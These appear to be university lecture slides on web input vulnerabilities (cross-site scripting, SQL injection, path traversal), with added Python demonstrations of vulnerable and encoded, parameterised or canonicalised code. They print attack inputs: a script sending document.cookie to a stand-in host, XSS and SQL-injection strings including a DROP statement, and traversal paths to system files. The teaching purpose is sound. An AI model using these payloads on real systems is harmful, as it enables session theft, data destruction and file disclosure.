Secure Software Engineering: Input Vulnerabilities
CPSC 410
Input Vulnerabilities
• We all know not to run "code" retrieved from suspicious places
• But passive "data" may be interpreted as malicious instructions
System.out.println("/etc/password");
vs.
File file = new File("/etc/password");
3 Most Common Input Vulnerabilities on Web
1. Cross-site Scripting
2. SQL Injection
3. Directory Traversal
See http://www.owasp.com - the Open Web App Security Project
Cross Site Scripting
• Web browsers should only execute JavaScript from sites that you visit
• But … Web sites often echo values given as input, e.g.
Input: http://www.foo.com?username='Eric'
Output page: Hello Eric
• If we put JavaScript into an input, an output page could include that JavaScript!
• The tester must assume every data entry point is a possible XSS hole.
Example: Invectus on McDonald's
http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
Decoded: queryText="><img src="http://i55.tinypic.com/witu7d.png" height="650" width="1000">
Source: http://www.acunetix.com/blog/news/full-disclosure-high-profile-websites-xss/
Malicious Script Input
• Basic example (assume URL encoding)
http://www.foo.com?username=<script>alert(“Hello World”)</script>
• Steal user’s cookies
<script type='text/javascript'>
var img = document.createElement('img');
img.setAttribute('src', 'http://localhost:8080?cook=' + escape(document.cookie));
document.body.appendChild(img);
</script>
GWT vulnerabilities
• JavaScript on your host page that is unrelated to GWT
• Code you write that sets innerHTML on GWT Widget objects
• Using the JSON API to parse untrusted strings (which ultimately calls JavaScript's eval function)
• JavaScript Native Interface (JSNI) code that you write that does something unsafe (such as setting innerHTML, calling eval, writing directly to the document via document.write, etc.)
Src: https://developers.google.com/web-toolkit/articles/security_for_gwt_applications#xss
InnerHTML example
<html>
<head>
  <script language="JavaScript">
    // newContent is inserted as markup, not text: any <script> or event
    // handler attribute in it becomes part of the live document
    function fillMyDiv(newContent) {
      document.getElementById('mydiv').innerHTML = newContent;
    }
  </script>
</head>
<body>
  <p>Some text before mydiv.</p>
  <div id="mydiv"></div>
  <p>Some text after mydiv.</p>
</body>
</html>
GWT Guidelines
• Carefully inspect and strip or escape any strings you assign to innerHTML using GWT code
• Carefully inspect any JavaScript strings you pass to GWT's JSON parser
• Carefully inspect any strings you pass to eval or assign to innerHTML via a JSNI method
• Take care in your native JSNI methods to not do anything that would expose you to attacks
Best Solution
• Filter any data which is echoed back to HTML
• e.g.
– http://josephoconnell.com/java/xss-html-filter/
String input = request.getParameter("data");
String clean = new HTMLInputFilter().filter(input);
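Added example, not from the slides, written in Python rather than the lecture's Java so it runs with the standard library alone: the same echo in two HTML contexts (element text and an attribute value), first unencoded and then HTML-encoded. The inputs are the slides' alert script and the McDonald's attribute break-out, with a placeholder image URL.

```python
import html

# Constructed sample inputs: the two payloads shown in the slides.
SCRIPT_PAYLOAD = '<script>alert("Hello World")</script>'
# Placeholder URL stands in for the image used in the McDonald's example.
ATTR_BREAKOUT = '"><img src="http://example.invalid/x.png" height="650" width="1000">'


def greet_unsafe(username: str) -> str:
    """The vulnerable pattern: the input is echoed straight into the page."""
    return "<p>Hello " + username + "</p>"


def greet_safe(username: str) -> str:
    """HTML-encode the value before it lands in element text."""
    return "<p>Hello " + html.escape(username, quote=True) + "</p>"


def search_box_unsafe(query: str) -> str:
    """Echoing input inside an attribute value without encoding lets a
    leading '">' close the attribute and start a new tag."""
    return '<input type="text" name="queryText" value="' + query + '">'


def search_box_safe(query: str) -> str:
    """quote=True also encodes '"', so the value cannot escape the attribute."""
    escaped = html.escape(query, quote=True)
    return '<input type="text" name="queryText" value="' + escaped + '">'


def contains_injected_tag(page: str) -> bool:
    """Crude check used only for the demonstration: did an attacker-supplied
    tag survive as markup rather than as text?"""
    return "<script" in page or "<img" in page


if __name__ == "__main__":
    for page in (greet_unsafe(SCRIPT_PAYLOAD), greet_safe(SCRIPT_PAYLOAD),
                 search_box_unsafe(ATTR_BREAKOUT), search_box_safe(ATTR_BREAKOUT)):
        print(contains_injected_tag(page), page)
```

Output encoding is applied at the point where data is written into the page, and the encoding depends on the context (text, attribute, URL, script); the same string can be safe in one context and not another.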
Simple Web App
• A Web form that allows the user to look up account details
• Underneath – a Java Web application serving the requests
SQL Injection Example
• Happy-go-lucky SQL statement:
String query = "SELECT Username, UserID, Password FROM Users WHERE username = '" + user + "' AND password = '" + password + "'";
• Leads to SQL injection
– One of the most common Web application vulnerabilities, caused by lack of input validation
• But how?
– Typical way to construct a SQL query using string concatenation
– Looks benign on the surface
– But let's play with it a bit more…
Injecting Malicious Data (1)
query = "SELECT Username, UserID, Password
FROM Users WHERE
Username = 'bob'
AND Password = '********'"
Press "Submit"
Injecting Malicious Data (2)
query = "SELECT Username, UserID, Password
FROM Users WHERE
Username = 'bob'--
' AND Password = ''"
Press "Submit"
Injecting Malicious Data (3)
query = "SELECT Username, UserID, Password
FROM Users WHERE
Username = 'bob'; DROP Users--
' AND Password = ''"
Press "Submit"
Heart of the Issue: Tainted Input Data
[Diagram: a hacker's browser sends evil input to the Web application; the evil input flows on to the database and back out in the output page. Insert input checking at the application boundary to stop cross-site scripting and SQL injections.]
Bobby Tables
http://xkcd.com/327/
Mitigating SQL Injection
• Always use Prepared Statements or Stored Procedures
– Instead of:
stmt.execute("UPDATE EMPLOYEES SET SALARY = " + input1 + " WHERE ID = " + input2);
– Use:
PreparedStatement pstmt = conn.prepareStatement("UPDATE EMPLOYEES SET SALARY = ? WHERE ID = ?");
pstmt.setBigDecimal(1, input1);
pstmt.setInt(2, input2);
• The account used to make the database connection must have “Least privilege.” If the application only requires read access then the account must be given read access only.
• Avoid disclosing error information: Weak error handling is a great way for an attacker to profile SQL injection attacks.
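Added example, not part of the slides, using Python's built-in sqlite3 in place of JDBC so it runs stand-alone: the concatenated login query from the slides beside its parameterised equivalent, both fed the bob'-- input from the injection slides. The Users table and credentials are constructed for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the slides' Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserID INTEGER, Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES (1, 'bob', 's3cret')")
    return conn


def login_concat(conn: sqlite3.Connection, user: str, password: str):
    """The 'happy-go-lucky' pattern: the query text is built by string
    concatenation, so a quote in the input becomes SQL syntax and the
    '--' comments out the password check."""
    query = ("SELECT Username, UserID FROM Users WHERE Username = '" + user
             + "' AND Password = '" + password + "'")
    return conn.execute(query).fetchone()


def login_prepared(conn: sqlite3.Connection, user: str, password: str):
    """Parameterised query (the PreparedStatement equivalent): the values
    travel separately from the SQL text, so bob'-- is compared literally
    against Username and never matches."""
    query = "SELECT Username, UserID FROM Users WHERE Username = ? AND Password = ?"
    return conn.execute(query, (user, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("concat, wrong password: ", login_concat(db, "bob'--", "wrong"))
    print("prepared, wrong password:", login_prepared(db, "bob'--", "wrong"))
    print("prepared, right password:", login_prepared(db, "bob", "s3cret"))
```

Note that sqlite3's execute() happens to refuse strings containing more than one statement, so the DROP variant from slide (3) fails here for an incidental reason; other drivers execute it, and parameterisation is the defence in every case.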
'SQL' injection on GWT
• More a vulnerability of the RPC services
– Could send arbitrary data to your datastore (once the JavaScript is de-obfuscated)
• Also possible to do JDOQL injection
– Use Query object and parameters instead of String syntax
Query query = pm.newQuery(Employee.class);
query.setFilter("lastName == lastNameParam");
query.setOrdering("hireDate desc");
query.declareParameters("String lastNameParam");
…
List<Employee> results = (List<Employee>) query.execute("Smith");
query.closeAll();
Recent Examples
• On March 27, 2011 mysql.com, the official homepage for MySQL, was compromised
• On June 1, 2011, LulzSec stole information from Sony PS3 users
• In August, 2011, Hacker Steals User Records From Nokia Developer Site
Directory/Path Traversal
• Occurs when user input is used to create the path for reading a file on disk
http://myblog.com/view?photo=eric.jpg
String file = request.getParameter("photo");
File photo = new File("/images/" + file);
See https://www.owasp.org/index.php/Path_Traversal
Directory Traversal
Malicious input: http://myblog.com/view?photo=../../../../../Windows/system.ini
• Has been used to retrieve
– "web.xml" files
– Apache conf files
– UNIX password files
• Other example: you let the user choose between different style templates and save the template filename in their profile
Example 2
• http://some_site.com.br/get-files.jsp?file=report.pdf
• http://some_site.com.br/get-page.php?home=aaa.html
• In these examples it's possible to insert a malicious string as the variable parameter to access files located outside the web publish directory.
• http://some_site.com.br/get-files?file=../../../../some dir/some file
• http://some_site.com.br/../../../../some dir/some file
Best Solution
• Don't construct file paths from user input
• Understand how your web server handles file access.
• Create a UUID (Universally Unique IDentifier) for each file and save it as a column with the data
String uuid = UUID.randomUUID().toString();
File savedFile = new File(uuid);
• Example database table for images (columns):
picID picName picDesc picOwner picFormat uuid
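Added example covering both halves of this slide; it is not the lecture's code and is in Python rather than Java so it runs as-is. The first half canonicalises the joined path and requires it to stay under the image root (the ../../../../../Windows/system.ini input from the earlier slide, an absolute path, and a sibling directory are all rejected); the second half is the UUID-keyed catalogue that never builds a path from the request at all. /images is the assumed root from the slides.

```python
import os
import uuid

IMAGE_ROOT = "/images"  # assumed base directory, as in the slides


def resolve_photo_unsafe(name: str) -> str:
    """The slides' vulnerable pattern: concatenate and open."""
    return IMAGE_ROOT + "/" + name


def resolve_photo_safe(name: str):
    """Canonicalise the joined path and require it to stay under IMAGE_ROOT.
    Returns None for anything that escapes: ../ sequences, absolute paths,
    and look-alike prefixes such as /images2 (commonpath compares whole
    components, unlike a plain str.startswith check)."""
    root = os.path.realpath(IMAGE_ROOT)
    full = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, full]) != root:
        return None
    return full


# Slides' recommended design: map an opaque UUID to the stored file so the
# browser only ever sends an id, never a file name.
_catalogue: dict = {}


def store_image(pic_name: str, pic_owner: str) -> str:
    file_id = str(uuid.uuid4())  # Java: UUID.randomUUID().toString()
    _catalogue[file_id] = {"picName": pic_name, "picOwner": pic_owner,
                           "path": os.path.join(IMAGE_ROOT, file_id)}
    return file_id


def image_path(file_id: str):
    """Look the id up; an unknown or malformed id never reaches the filesystem."""
    entry = _catalogue.get(file_id)
    return entry["path"] if entry else None


if __name__ == "__main__":
    print(resolve_photo_unsafe("../../../../../Windows/system.ini"))
    print(resolve_photo_safe("../../../../../Windows/system.ini"))
    fid = store_image("eric.jpg", "eric")
    print(image_path(fid), image_path("../../../../../Windows/system.ini"))
```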
2 Rules to Remember
1. Always assume many users are malicious and want to break your software
2. Don’t assume a Web site is always accessed through a normal Web Browser
Famous last words, “I wrote the JavaScript so that this would never happen”